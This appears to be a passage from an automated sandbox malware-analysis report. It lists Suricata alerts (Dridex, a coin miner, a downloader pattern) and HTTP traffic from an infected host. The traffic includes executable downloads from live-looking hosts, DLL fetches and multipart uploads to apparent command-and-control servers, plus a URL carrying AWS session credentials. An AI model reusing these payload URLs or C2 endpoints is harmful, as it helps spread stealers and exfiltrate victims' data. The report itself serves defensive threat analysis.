                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49761 -> 116.203.165.127:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49760 -> 116.203.165.127:443
                              Source: Network trafficSuricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.9:57472 -> 1.1.1.1:53
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49763 -> 116.203.165.127:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49765 -> 116.203.165.127:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49766 -> 116.203.165.127:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49768 -> 116.203.165.127:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49767 -> 116.203.165.127:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49770 -> 116.203.165.127:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49773 -> 116.203.165.127:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49769 -> 116.203.165.127:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49774 -> 116.203.165.127:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49775 -> 116.203.165.127:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49771 -> 116.203.165.127:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49777 -> 116.203.165.127:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49780 -> 116.203.165.127:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49799 -> 116.203.165.127:443
                              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49776 -> 147.45.44.104:80
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49805 -> 116.203.165.127:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49796 -> 116.203.165.127:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49801 -> 116.203.165.127:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49813 -> 116.203.165.127:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49792 -> 116.203.165.127:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49812 -> 116.203.165.127:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49818 -> 116.203.165.127:443
                              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49725 -> 185.166.143.48:443
                              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49726 -> 162.241.61.218:443
                              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49729 -> 162.241.61.218:443
                              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49731 -> 162.241.61.218:443
                              Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: api64.ipify.org
                              Source: global trafficHTTP traffic detected: GET /widget/demo/8.46.123.33 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: ipinfo.io
                              Source: global trafficHTTP traffic detected: GET /kcatelin/jameson/downloads/easyfirewall.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: bitbucket.orgCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /vsfdhgg15.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: nerv.com.peCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /vfsdgdf.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: nerv.com.peCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /bbfbfb0f-4597-4ff3-b025-124f61baf271/downloads/7f30c6a5-e68f-46b2-82dc-be29f7fa498f/easyfirewall.exe?response-content-disposition=attachment%3B%20filename%3D%22easyfirewall.exe%22&AWSAccessKeyId=ASIA6KOSE3BNALNDSNXI&Signature=7Oy%2Bjzmz%2FlXC%2FL1QASQlZvKc%2Bl8%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEFUaCXVzLWVhc3QtMSJGMEQCIDE7ySbs3yUKutqnoMVZe2lBMy%2FzLUXK7oA9sVz3qh3fAiB7uhzCaJ9QAf8KACE%2BI3nJiDzFAW0ja%2FG7sHqOwjkBVyqwAgiO%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMsG28MyjVkhRoivDZKoQC2Nc%2FjnX7Tbhrr0Gh8ipoFpgeJ%2BpNqndZT4i%2BOmSK6LFExTbeLlFeC3aOopynxOWTtXGkMfcvWjgryJmsRfTly0%2F%2F3B3Vx63gKJ4o3QZZExWB5ecbpWMs%2Bc48sEJ8nIrd4YZibjmyiqvqkjxZkJTMVKCLLCM7ZO2hRDaB22a7lR1E7CpB7AAoyh%2FiTlDsxWuHKuDLvqMqx8UNPVEvpzj3sV2M4kl9sn7TBWI5yWl%2FZymPomH2fXbA6yTcmqlPq%2FrDycduU0I01uI8v91zRz7QDYqWlTquKfBYFo%2FoWPY7toSWKATL7%2FwXiHqODNH93aSs63LBq39Xw41mTOonKYbRosm22PQwjf66twY6ngHaj1zb%2FhGT4dlAnMdSXHAGlvyvWd50O5Ui%2FXnBPKGu108w8WdcK%2BdyQpVVrnszsaYmewsJVta0GbBLEkWzuG6hpH2CVZ%2FFLyb67eupBy2hlY65kjfqM4In7bmglhQvyp8rQxvkvy0gnGZmosr%2FkSQ9CPGtgk4LksgvH44YQAs89ZIepAI4tRgHG8daweiznls0oHyfxP5H2e2ydTKV3g%3D%3D&Expires=1726924309 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Cache-Control: no-cacheHost: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /sdhsfd.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: nerv.com.peCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /1nhuM4.js HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: iplogger.org
                              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIECBFIDGDAKFHIEHJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDBFIIECBGDGDGDHCAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JEHIIDGCFHIEGDGCBFHDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAAEBFHJJDAAKFIECGDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAAAAFIIJDBGDGCGDAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 6797Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDBAFIIECBFHIEBKJJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJJJKFIIIJJJECAAEHDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBFBGCGIJKJJKFIDBFCGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JECAFHJEGCFCBFIEGCAEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDAAKEGDBFIJJKFHCFBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHJJEGHIIDAFIDHJDHJEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBFIJEGIDBGIECAKKEGDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 461Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGHJJDGHCBGDHIECBGIDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 130901Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAEHIEBGHDAFIEBGIEHJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIJEHCBAKFCAKFHCGDGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 499Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFBAKEHIEBKJJJJJKKKEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Connection: Keep-AliveCache-Control: no-cacheHost: cowod.hopto.org
                              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJDGCGDAAAKECAKKJDAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGDHJEGIEBFHDGDGHDHIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCGIJDBAFCBAAKECGDGCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKJEBAAECBGDHIECAKJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDHIEGIIIECAKEBFBAAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 6581Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIECBFIDGDAKFHIEHJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /api/wp-ping.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 41.216.188.190
                              Source: global trafficHTTP traffic detected: POST /api/wp-admin.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Content-Length: 133Host: 41.216.188.190
                              Source: global trafficHTTP traffic detected: POST /api/wp-admin.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Content-Length: 133Host: 41.216.188.190
                              Source: global trafficHTTP traffic detected: HEAD /prog/66e705d09b33c_jack.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: HEAD /kurwa HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 176.111.174.109Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: HEAD /yuop/66ee79315857f_setup33333.exe#lyla HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: HEAD /Files/1.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 103.130.147.211Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: HEAD /thebig/noode.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 176.113.115.33Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: HEAD /yuop/66eea6336b153_app16540406983468141987.exe#1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /Files/1.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 103.130.147.211Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: HEAD /lopsa/66ea645129e6a_jacobs.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /kurwa HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 176.111.174.109Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: HEAD /yuop/66edb89bc4073_crypted.exe#xin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: HEAD /lopsa/66ebb3bf78bd6_Send.exe#111us300 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /thebig/noode.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 176.113.115.33Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: HEAD /yuop/66ed9885d9aee_Day2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /prog/66e705d09b33c_jack.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /yuop/66ee79315857f_setup33333.exe#lyla HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /yuop/66eea6336b153_app16540406983468141987.exe#1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /lopsa/66ea645129e6a_jacobs.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /yuop/66edb89bc4073_crypted.exe#xin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /lopsa/66ebb3bf78bd6_Send.exe#111us300 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /yuop/66ed9885d9aee_Day2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /api/wp-admin.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Content-Length: 561Host: 41.216.188.190
                              Source: global trafficHTTP traffic detected: POST /api/wp-admin.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Content-Length: 561Host: 41.216.188.190
                              Source: global trafficHTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary30195191User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 411Host: tventyvf20pt.top
                              Source: global trafficHTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary80468628User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 87204Host: tventyvf20pt.top
                              Source: global trafficHTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary41747459User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 32239Host: tventyvf20pt.top
                              Source: global trafficHTTP traffic detected: GET /prog/66ecb454d2b4a_lgfdsjgds.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGDGHCBGDHJJKECAECBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: cowod.hopto.orgContent-Length: 3577Connection: Keep-AliveCache-Control: no-cache
